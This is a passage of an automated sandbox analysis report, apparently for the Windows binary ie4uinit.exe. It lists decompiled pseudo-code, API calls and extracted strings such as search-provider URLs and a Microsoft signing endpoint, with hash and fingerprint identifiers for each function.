				if (r15d == 0) goto 0x319d0efd;
				r8d = r15d;
				E00007FF77FF7319CE900( *((intOrPtr*)( *_t208 + 0x10)),  *(_t236 - 0x41), _t236 - 0x59, _t189, _t233, _t236);
				 *(_t231 + 0x20) =  *(_t236 - 0x59);
				 *((long long*)(_t231 + 0x28)) =  *((intOrPtr*)(_t236 - 0x51));
				 *((intOrPtr*)(_t231 + 0x30)) =  *((intOrPtr*)(_t236 - 0x49));
				E00007FF77FF7319C1698(_t185,  *((intOrPtr*)(_t231 + 0x28)));
				goto 0x319d0f16;
				E00007FF77FF7319C1698(_t185, _t189);
				E00007FF77FF7319C1698(_t185,  *(_t236 - 0x41));
				E00007FF77FF7319C1698(_t185,  *(_t236 - 9));
				if ( *(_t236 - 0x39) == 0) goto 0x319d0f45;
				 *0x319e7038();
				return _t157;
			}

0x7ff7319d0c4c
0x7ff7319d0c4c
0x7ff7319d0c51
0x7ff7319d0c61
0x7ff7319d0c71
0x7ff7319d0c75
0x7ff7319d0c78
0x7ff7319d0c7c
0x7ff7319d0c7f
0x7ff7319d0c82
0x7ff7319d0c86
0x7ff7319d0c8e
0x7ff7319d0c91
0x7ff7319d0c97
0x7ff7319d0cac
0x7ff7319d0cb2
0x7ff7319d0cb6
0x7ff7319d0cba
0x7ff7319d0cbe
0x7ff7319d0ccc
0x7ff7319d0cd2
0x7ff7319d0cd5
0x7ff7319d0cd7
0x7ff7319d0cdd
0x7ff7319d0ce0
0x7ff7319d0ce5
0x7ff7319d0ceb
0x7ff7319d0cf5
0x7ff7319d0cf8
0x7ff7319d0cfc
0x7ff7319d0d02
0x7ff7319d0d08
0x7ff7319d0d0f
0x7ff7319d0d14
0x7ff7319d0d18
0x7ff7319d0d20
0x7ff7319d0d24
0x7ff7319d0d26
0x7ff7319d0d30
0x7ff7319d0d33
0x7ff7319d0d37
0x7ff7319d0d3b
0x7ff7319d0d3d
0x7ff7319d0d43
0x7ff7319d0d4a
0x7ff7319d0d53
0x7ff7319d0d5b
0x7ff7319d0d5f
0x7ff7319d0d64
0x7ff7319d0d69
0x7ff7319d0d6e
0x7ff7319d0d72
0x7ff7319d0d76
0x7ff7319d0d7a
0x7ff7319d0d88
0x7ff7319d0d8d
0x7ff7319d0d93
0x7ff7319d0d9b
0x7ff7319d0da1
0x7ff7319d0da8
0x7ff7319d0dad
0x7ff7319d0db9
0x7ff7319d0dc0
0x7ff7319d0dc9
0x7ff7319d0dcf
0x7ff7319d0dd4
0x7ff7319d0dd8
0x7ff7319d0de4
0x7ff7319d0dee
0x7ff7319d0df0
0x7ff7319d0df6
0x7ff7319d0e03
0x7ff7319d0e0a
0x7ff7319d0e17
0x7ff7319d0e1c
0x7ff7319d0e28
0x7ff7319d0e2e
0x7ff7319d0e35
0x7ff7319d0e3a
0x7ff7319d0e3e
0x7ff7319d0e44
0x7ff7319d0e4e
0x7ff7319d0e51
0x7ff7319d0e55
0x7ff7319d0e5b
0x7ff7319d0e65
0x7ff7319d0e68
0x7ff7319d0e70
0x7ff7319d0e77
0x7ff7319d0e7e
0x7ff7319d0e82
0x7ff7319d0e85
0x7ff7319d0e92
0x7ff7319d0e97
0x7ff7319d0e9b
0x7ff7319d0ea1
0x7ff7319d0ea3
0x7ff7319d0ead
0x7ff7319d0eb5
0x7ff7319d0ebc
0x7ff7319d0ec3
0x7ff7319d0ec7
0x7ff7319d0eca
0x7ff7319d0ed5
0x7ff7319d0ed8
0x7ff7319d0edc
0x7ff7319d0ee2
0x7ff7319d0ee4
0x7ff7319d0eee
0x7ff7319d0efd
0x7ff7319d0f04
0x7ff7319d0f08
0x7ff7319d0f0b
0x7ff7319d0f10
0x7ff7319d0f19
0x7ff7319d0f21
0x7ff7319d0f2a
0x7ff7319d0f36
0x7ff7319d0f3f
0x7ff7319d0f61

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b22c889bcac4f057fb753f854cf6cb558e54d618642e06831f7a1660cd20aff9
Instruction ID: c8c97f0526b10c3a2d3479a9d93599a08497a6c905965910f807cfa87debe14a
Opcode Fuzzy Hash: b22c889bcac4f057fb753f854cf6cb558e54d618642e06831f7a1660cd20aff9
Instruction Fuzzy Hash: D3A14633F08A85AAEB14EFB5C0442AD77B2BB4878CB45453ACE4D67B48DF74E4248760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E3330 Relevance: .1, Instructions: 124
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7319E3330(long long __rbx, intOrPtr* __rdx, long long __rdi, long long __rsi, signed int* __r9, void* __r10, long long _a8, long long _a16, long long _a24, signed int* _a40) {
				signed int _t51;
				unsigned int _t69;
				void* _t71;
				unsigned int _t75;
				unsigned int _t77;
				unsigned int _t82;
				signed int _t84;
				unsigned int _t87;
				void* _t92;
				signed int* _t97;
				intOrPtr* _t101;

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				r10d = r8d;
				_t92 = r8d - 2;
				if (_t92 >= 0) goto 0x319e3352;
				goto 0x319e3507;
				r9d = __r9[1];
				r11d = 0;
				r9d = r9d | 0x00000001;
				_t51 =  *__r9 | 0x00000001;
				r8d = r11d;
				r8d = r8d +  *__rdx;
				r10d = r10d + 0xfffffffe;
				r8d = r8d * _t51;
				_t101 = __rdx + 8;
				_t69 = r8d * 0xb1110000 - (r8d >> 0x10) * 0x30674eef;
				r8d = _t69 * 0x5b9f0000;
				r8d = r8d - (_t69 >> 0x10) * 0x78f7a461;
				_t71 = ((r8d >> 0x10) * 0x12ceb96d - r8d * 0x46930000 >> 0x10) * 0x257e1d83 + ((r8d >> 0x10) * 0x12ceb96d - r8d * 0x46930000) * 0x1d830000;
				r11d = r11d + _t71;
				_t75 = (_t71 +  *((intOrPtr*)(_t101 - 4))) * r9d * 0x16f50000 - ((_t71 +  *((intOrPtr*)(_t101 - 4))) * r9d >> 0x10) * 0x5d8be90b;
				r8d = _t75 * 0x96ff0000;
				r8d = r8d - (_t75 >> 0x10) * 0x2c7c6901;
				_t77 = (r8d >> 0x10) * 0x7c932b89 + r8d * 0x2b890000;
				r8d = _t77 * 0x9f690000;
				r8d = r8d - (_t77 >> 0x10) * 0x405b6097;
				r11d = r11d + r8d;
				if (_t92 != 0) goto 0x319e336e;
				if (r10d != 1) goto 0x319e34f9;
				_t82 = ( *_t101 + r8d) * _t51 * 0xb1110000 - (( *_t101 + r8d) * _t51 >> 0x10) * 0x30674eef;
				r8d = _t82 * 0x5b9f0000;
				r8d = r8d - (_t82 >> 0x10) * 0x78f7a461;
				_t84 = ((r8d >> 0x10) * 0x12ceb96d - r8d * 0x46930000 >> 0x10) * 0x257e1d83 + ((r8d >> 0x10) * 0x12ceb96d - r8d * 0x46930000) * 0x1d830000;
				r11d = r11d + _t84;
				_t87 = _t84 * r9d * 0x16f50000 - (_t84 * r9d >> 0x10) * 0x5d8be90b;
				r8d = _t87 * 0x96ff0000;
				r8d = r8d - (_t87 >> 0x10) * 0x2c7c6901;
				r9d = (r8d >> 0x10) * 0x7c932b89;
				r9d = r9d + r8d * 0x2b890000;
				r8d = r9d * 0x9f690000;
				r8d = r8d - (r9d >> 0x10) * 0x405b6097;
				r11d = r11d + r8d;
				_t97 = _a40;
				 *_t97 = r8d;
				_t97[1] = r11d;
				return 1;
			}

0x7ff7319e3330
0x7ff7319e3335
0x7ff7319e333a
0x7ff7319e333f
0x7ff7319e3345
0x7ff7319e3349
0x7ff7319e334d
0x7ff7319e3359
0x7ff7319e335d
0x7ff7319e3360
0x7ff7319e3366
0x7ff7319e3369
0x7ff7319e336e
0x7ff7319e3371
0x7ff7319e3375
0x7ff7319e3379
0x7ff7319e3390
0x7ff7319e3392
0x7ff7319e33a4
0x7ff7319e33cd
0x7ff7319e33cf
0x7ff7319e33ea
0x7ff7319e33ec
0x7ff7319e33fe
0x7ff7319e3414
0x7ff7319e3416
0x7ff7319e3428
0x7ff7319e342b
0x7ff7319e3432
0x7ff7319e343c
0x7ff7319e345b
0x7ff7319e345d
0x7ff7319e346f
0x7ff7319e3498
0x7ff7319e349a
0x7ff7319e34b2
0x7ff7319e34b4
0x7ff7319e34c6
0x7ff7319e34d6
0x7ff7319e34dd
0x7ff7319e34e0
0x7ff7319e34f3
0x7ff7319e34f6
0x7ff7319e34f9
0x7ff7319e3500
0x7ff7319e3503
0x7ff7319e3516

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03af0761061c05c8087de23d13a430ad1254f8bc16d93bf78891331ee02789e6
Instruction ID: 1c57e0a98f03fd13531e3bd86c531a4beab81980c0858209b8a8155e8d21a761
Opcode Fuzzy Hash: 03af0761061c05c8087de23d13a430ad1254f8bc16d93bf78891331ee02789e6
Instruction Fuzzy Hash: 47414532B305654AD71C4D3C962791DDD9E93C9380F90F93BE686CBFECD82AD5118A80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E31A8 Relevance: .1, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7319E31A8(long long __rbx, intOrPtr* __rdx, long long __rdi, long long __rsi, signed int* __r9, void* __r10, long long _a8, long long _a16, long long _a24, signed int* _a40) {
				signed int _t40;
				unsigned int _t56;
				signed int _t61;
				unsigned int _t63;
				signed int _t65;
				void* _t69;
				signed int* _t74;
				intOrPtr* _t78;

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				r10d = r8d;
				_t69 = r8d - 2;
				if (_t69 >= 0) goto 0x319e31ca;
				goto 0x319e331d;
				r11d =  *__r9;
				r11d = r11d | 0x00000001;
				r9d = 0;
				r11d = r11d + 0x69fb0000;
				_t40 = (__r9[1] | 0x00000001) + 0x13db0000;
				r8d = r9d;
				r8d = r8d +  *__rdx;
				_t78 = __rdx + 8;
				r8d = r8d >> 0x10;
				r10d = r10d + 0xfffffffe;
				_t56 = (r11d * r8d - r8d * 0x10fa9605 >> 0x10) * 0x689b6b9f + (r11d * r8d - r8d * 0x10fa9605) * 0x79f8a395;
				r8d = _t56 * 0xea970001;
				r8d = r8d - (_t56 >> 0x10) * 0x3c101569;
				r9d = r9d + r8d;
				r8d = r8d +  *((intOrPtr*)(_t78 - 4));
				_t61 = (_t40 * r8d - (r8d >> 0x10) * 0x3ce8ec25) * 0x59c3af2d - (_t40 * r8d - (r8d >> 0x10) * 0x3ce8ec25 >> 0x10) * 0x2232e0f1;
				r8d = (_t61 >> 0x10) * 0x35bd1ec9;
				r8d = r8d + _t61 * 0x1ec90001;
				r9d = r9d + r8d;
				if (_t69 != 0) goto 0x319e31f3;
				if (r10d != 1) goto 0x319e330f;
				r8d = r8d +  *_t78;
				r11d = r11d * r8d;
				r8d = r8d >> 0x10;
				r11d = r11d - r8d * 0x10fa9605;
				_t63 = (r11d >> 0x10) * 0x689b6b9f + r11d * 0x79f8a395;
				r8d = _t63 * 0xea970001;
				r8d = r8d - (_t63 >> 0x10) * 0x3c101569;
				r9d = r9d + r8d;
				_t65 = (_t40 * r8d - (r8d >> 0x10) * 0x3ce8ec25) * 0x59c3af2d - (_t40 * r8d - (r8d >> 0x10) * 0x3ce8ec25 >> 0x10) * 0x2232e0f1;
				r8d = (_t65 >> 0x10) * 0x35bd1ec9;
				r8d = r8d + _t65 * 0x1ec90001;
				r9d = r9d + r8d;
				_t74 = _a40;
				 *_t74 = r8d;
				_t74[1] = r9d;
				return 1;
			}

0x7ff7319e31a8
0x7ff7319e31ad
0x7ff7319e31b2
0x7ff7319e31b7
0x7ff7319e31bd
0x7ff7319e31c1
0x7ff7319e31c5
0x7ff7319e31ca
0x7ff7319e31d5
0x7ff7319e31de
0x7ff7319e31e1
0x7ff7319e31e8
0x7ff7319e31ee
0x7ff7319e31f3
0x7ff7319e31fd
0x7ff7319e3201
0x7ff7319e3205
0x7ff7319e3223
0x7ff7319e3225
0x7ff7319e3239
0x7ff7319e323c
0x7ff7319e323f
0x7ff7319e3266
0x7ff7319e326d
0x7ff7319e327a
0x7ff7319e327d
0x7ff7319e3284
0x7ff7319e328e
0x7ff7319e3290
0x7ff7319e3293
0x7ff7319e3297
0x7ff7319e32a2
0x7ff7319e32b8
0x7ff7319e32ba
0x7ff7319e32cc
0x7ff7319e32d9
0x7ff7319e32f5
0x7ff7319e32fc
0x7ff7319e3309
0x7ff7319e330c
0x7ff7319e330f
0x7ff7319e3316
0x7ff7319e3319
0x7ff7319e332c

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8601153844eb919040d69870f82575c3ddd0f300710fa1108b9e361430ee609
Instruction ID: 5429d9e80fb5b2a012bc14d8a7115b296fdcc051cf6206c90e323c6fea1052cd
Opcode Fuzzy Hash: a8601153844eb919040d69870f82575c3ddd0f300710fa1108b9e361430ee609
Instruction Fuzzy Hash: 3F318C7BF3016047C71C4E3CA61751DAA8E93D9380780F93AE646CBFD9D93AE9128B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C5BBC Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 158processfilesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7319C5974: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7319C1773), ref: 00007FF7319C59AD
Part of subcall function 00007FF7319C5974: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7319C1773), ref: 00007FF7319C5A1F
Part of subcall function 00007FF7319C5974: PostThreadMessageW.USER32 ref: 00007FF7319C5A39

memset.MSVCRT ref: 00007FF7319C5C1C
CreateFileW.KERNEL32 ref: 00007FF7319C5C8C
GetCurrentProcess.KERNEL32 ref: 00007FF7319C5C9F
GetCurrentProcess.KERNEL32 ref: 00007FF7319C5CA8
DuplicateHandle.KERNEL32 ref: 00007FF7319C5CD1
GetStdHandle.KERNEL32 ref: 00007FF7319C5CE4
CreateProcessW.KERNEL32 ref: 00007FF7319C5D3C
WaitForSingleObject.KERNEL32 ref: 00007FF7319C5D4F
GetLastError.KERNEL32 ref: 00007FF7319C5D60
CloseHandle.KERNEL32 ref: 00007FF7319C5D76
GetLastError.KERNEL32 ref: 00007FF7319C5D80
GetLastError.KERNEL32 ref: 00007FF7319C5DA2
GetExitCodeProcess.KERNEL32 ref: 00007FF7319C5DCD
GetLastError.KERNEL32 ref: 00007FF7319C5DE4
CloseHandle.KERNEL32 ref: 00007FF7319C5E03
CloseHandle.KERNEL32 ref: 00007FF7319C5E0D
CloseHandle.KERNEL32 ref: 00007FF7319C5E21
CloseHandle.KERNEL32 ref: 00007FF7319C5E34
CloseHandle.KERNEL32 ref: 00007FF7319C5E47

Strings

Command line returned: 0x%1!08lx!, xrefs: 00007FF7319C5DDB
Output will be redirected to: %1, xrefs: 00007FF7319C5CEF
Unable to get exit code. Error: 0x%1!08lx!, xrefs: 00007FF7319C5DED
Launching command line to remove package: %1, xrefs: 00007FF7319C5C02
Command line returned: %1!lx!, xrefs: 00007FF7319C5DA8

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Handle$Close$ErrorLastProcess$CreateCurrentMessage$CodeDuplicateExitFileFormatLocalObjectPostSingleThreadTimeWaitmemset
String ID: Command line returned: %1!lx!$Command line returned: 0x%1!08lx!$Launching command line to remove package: %1$Output will be redirected to: %1$Unable to get exit code. Error: 0x%1!08lx!
API String ID: 2537296607-2439298233
Opcode ID: 3668adff9b1a2427b4054f7464d01132104110429909409d793b28ff1df000aa
Instruction ID: e6758c4ea309818320d43c9b7eea58d3ed51e1c90fd8fa1826e0be6d2ad1c593
Opcode Fuzzy Hash: 3668adff9b1a2427b4054f7464d01132104110429909409d793b28ff1df000aa
Instruction Fuzzy Hash: 2F714C72F08A82AAF710AF60E4442ADB3B1BB4479CF804135DA8D57A5CCFBCD545EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D1B4C Relevance: 40.4, APIs: 1, Strings: 22, Instructions: 195COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7319CB35C: LoadLibraryW.KERNEL32 ref: 00007FF7319CB38D
Part of subcall function 00007FF7319CB35C: GetProcAddress.KERNEL32 ref: 00007FF7319CB3AE
Part of subcall function 00007FF7319CB35C: FreeLibrary.KERNEL32 ref: 00007FF7319CB3D0

LocaleNameToLCID.KERNEL32(?,?,?,?,?,?,?,00007FF7319CDFE9), ref: 00007FF7319D1DF7

Strings

!x-sys-default-locale, xrefs: 00007FF7319D1DF0
Yandex, xrefs: 00007FF7319D1CBB
https://suggest.yandex.by/suggest-ff.cgi?srv=ie11&part={searchTerms}&clid=2233627, xrefs: 00007FF7319D1C8B
https://suggest.yandex.ru/suggest-ff.cgi?srv=ie11&part={searchTerms}&clid=2233627, xrefs: 00007FF7319D1C79
{64AF4D11-6492-4C25-B014-B6C6CEE3B0C5}, xrefs: 00007FF7319D1E04
https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part={searchTerms}&clid=2233630, xrefs: 00007FF7319D1C9D
https://yandex.by/search/?text={searchTerms}&clid=2233627, xrefs: 00007FF7319D1C4B
https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part={searchTerms}&clid=2233627, xrefs: 00007FF7319D1C94
https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part={searchTerms}&clid=2233627, xrefs: 00007FF7319D1C82
{2562B2EF-500D-49FC-A350-5BC0D4C56EE3}, xrefs: 00007FF7319D1BDC
{461B4783-36F5-45B9-883E-35BA5ED4A823}, xrefs: 00007FF7319D1BBF
http://www.yandex.com/favicon.ico, xrefs: 00007FF7319D1CE2
https://yandex.com.tr/search/?text={searchTerms}&clid=2233630, xrefs: 00007FF7319D1C5D
http://www.baidu.com/favicon.ico, xrefs: 00007FF7319D1E1F
https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query={searchTerms}, xrefs: 00007FF7319D1BE3
{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}, xrefs: 00007FF7319D1C18
https://yandex.kz/search/?text={searchTerms}&clid=2233627, xrefs: 00007FF7319D1C42
http://www.yandex.com.tr/favicon.ico, xrefs: 00007FF7319D1DE2
https://www.haosou.com/s?src=win10&ie=utf-8&q={searchTerms}, xrefs: 00007FF7319D1BC6
https://www.baidu.com/s?tn=80035161_2_dg&wd={searchTerms}, xrefs: 00007FF7319D1E11
https://yandex.ua/search/?text={searchTerms}&clid=2233627, xrefs: 00007FF7319D1C54
https://yandex.ru/search/?text={searchTerms}&clid=2233627, xrefs: 00007FF7319D1C39

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Library$AddressFreeLoadLocaleNameProc
String ID: !x-sys-default-locale$Yandex$http://www.baidu.com/favicon.ico$http://www.yandex.com.tr/favicon.ico$http://www.yandex.com/favicon.ico$https://suggest.yandex.by/suggest-ff.cgi?srv=ie11&part={searchTerms}&clid=2233627$https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part={searchTerms}&clid=2233630$https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part={searchTerms}&clid=2233627$https://suggest.yandex.ru/suggest-ff.cgi?srv=ie11&part={searchTerms}&clid=2233627$https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part={searchTerms}&clid=2233627$https://www.baidu.com/s?tn=80035161_2_dg&wd={searchTerms}$https://www.haosou.com/s?src=win10&ie=utf-8&q={searchTerms}$https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query={searchTerms}$https://yandex.by/search/?text={searchTerms}&clid=2233627$https://yandex.com.tr/search/?text={searchTerms}&clid=2233630$https://yandex.kz/search/?text={searchTerms}&clid=2233627$https://yandex.ru/search/?text={searchTerms}&clid=2233627$https://yandex.ua/search/?text={searchTerms}&clid=2233627${2562B2EF-500D-49FC-A350-5BC0D4C56EE3}${461B4783-36F5-45B9-883E-35BA5ED4A823}${64AF4D11-6492-4C25-B014-B6C6CEE3B0C5}${8C3078A0-9AAB-4371-85D1-656CA8E46EE8}
API String ID: 2433311555-3546315627
Opcode ID: f81edb1bca117721a08df49f25c76aa5d5ed300d6daac04b66eb9647b83dbaec
Instruction ID: 5766e4399e204bc35925c0ab14cde23d03c8b31cb7f4e19543092c03d68aa92f
Opcode Fuzzy Hash: f81edb1bca117721a08df49f25c76aa5d5ed300d6daac04b66eb9647b83dbaec
Instruction Fuzzy Hash: C3912E27E0D987A1EB14AF29D8440B8A761FB4478CBD44036D90E437ADCFADE949E370

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D60C0 Relevance: 37.0, APIs: 10, Strings: 11, Instructions: 259memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7319D1154: #57.IERTUTIL ref: 00007FF7319D11A4
Part of subcall function 00007FF7319D1154: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7319D11CA
Part of subcall function 00007FF7319D1154: SysAllocString.OLEAUT32 ref: 00007FF7319D11F0
Part of subcall function 00007FF7319D1154: RegOpenKeyExW.ADVAPI32 ref: 00007FF7319D122D
Part of subcall function 00007FF7319D1154: RegGetValueW.ADVAPI32 ref: 00007FF7319D126B
Part of subcall function 00007FF7319D1154: RegCloseKey.ADVAPI32 ref: 00007FF7319D1293
Part of subcall function 00007FF7319D1154: SysStringLen.OLEAUT32 ref: 00007FF7319D12C9
Part of subcall function 00007FF7319D1154: memcpy_s.MSVCRT ref: 00007FF7319D12EE

SysFreeString.OLEAUT32 ref: 00007FF7319D6228

Part of subcall function 00007FF7319D73D0: CryptCreateHash.ADVAPI32 ref: 00007FF7319D741F
Part of subcall function 00007FF7319D73D0: CryptHashData.ADVAPI32 ref: 00007FF7319D7437
Part of subcall function 00007FF7319D73D0: CryptGetHashParam.ADVAPI32 ref: 00007FF7319D7460
Part of subcall function 00007FF7319D73D0: CryptDestroyHash.ADVAPI32 ref: 00007FF7319D7487

SysAllocString.OLEAUT32 ref: 00007FF7319D633B
SysFreeString.OLEAUT32 ref: 00007FF7319D637F
SysStringLen.OLEAUT32 ref: 00007FF7319D6388
VarBstrCat.OLEAUT32 ref: 00007FF7319D63A1
SysFreeString.OLEAUT32 ref: 00007FF7319D63B0
SysStringByteLen.OLEAUT32 ref: 00007FF7319D63CA
SysAllocStringByteLen.OLEAUT32 ref: 00007FF7319D63D5

Part of subcall function 00007FF7319E1558: SysAllocString.OLEAUT32 ref: 00007FF7319E1601

SysFreeString.OLEAUT32 ref: 00007FF7319D63F5
SysFreeString.OLEAUT32 ref: 00007FF7319D6405

Part of subcall function 00007FF7319E1558: SysFreeString.OLEAUT32 ref: 00007FF7319E162F

Part of subcall function 00007FF7319C1698: GetProcessHeap.KERNEL32 ref: 00007FF7319C16A5
Part of subcall function 00007FF7319C1698: HeapFree.KERNEL32 ref: 00007FF7319C16B3

Strings

product, xrefs: 00007FF7319D6192
source, xrefs: 00007FF7319D630B
<request/>, xrefs: 00007FF7319D6150
<?xml version="1.0" encoding="utf-8"?>, xrefs: 00007FF7319D6334
euppid, xrefs: 00007FF7319D61CD
hashvalue, xrefs: 00007FF7319D629D
https://ieonline.microsoft.com/EUPP/v1/service?action=signvalue&appid=Microsoft_IE_EUPP, xrefs: 00007FF7319D60C9
rid, xrefs: 00007FF7319D6212
type, xrefs: 00007FF7319D61E6
trademark, xrefs: 00007FF7319D61B3
thumbprint, xrefs: 00007FF7319D62E3

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: String$Free$AllocCryptHash$ByteHeap$BstrCloseConvertCreateDataDestroyOpenParamProcessValuememcpy_s
String ID: <?xml version="1.0" encoding="utf-8"?>$<request/>$euppid$hashvalue$https://ieonline.microsoft.com/EUPP/v1/service?action=signvalue&appid=Microsoft_IE_EUPP$product$rid$source$thumbprint$trademark$type
API String ID: 534182030-1803989589
Opcode ID: e99523cb5efc2009168f5d80913c32bb41b5871ee4e76d9242a70470dec59846
Instruction ID: 8bda479188284d2a78b418a2304c35d7921d5cf27b032cd0bf55e5e53a2dc07b
Opcode Fuzzy Hash: e99523cb5efc2009168f5d80913c32bb41b5871ee4e76d9242a70470dec59846
Instruction Fuzzy Hash: 4FB15B22F08A97A5FB00BBA5D8443BCA761AF44B9CF954035CE0D9B65DDFBCE405A360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C6040 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 227memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32 ref: 00007FF7319C608F
VariantInit.OLEAUT32 ref: 00007FF7319C60A1
VariantInit.OLEAUT32 ref: 00007FF7319C60BD
VariantInit.OLEAUT32 ref: 00007FF7319C60DA
VariantInit.OLEAUT32 ref: 00007FF7319C60F8
VariantClear.OLEAUT32 ref: 00007FF7319C6140
VariantClear.OLEAUT32 ref: 00007FF7319C6153
VariantClear.OLEAUT32 ref: 00007FF7319C6165
VariantClear.OLEAUT32 ref: 00007FF7319C6177

Part of subcall function 00007FF7319C1670: GetProcessHeap.KERNEL32 ref: 00007FF7319C1679

SysAllocString.OLEAUT32 ref: 00007FF7319C61BD
SysFreeString.OLEAUT32 ref: 00007FF7319C620B
SHRegGetUSValueW.SHLWAPI ref: 00007FF7319C62C3
SysAllocString.OLEAUT32 ref: 00007FF7319C62F3
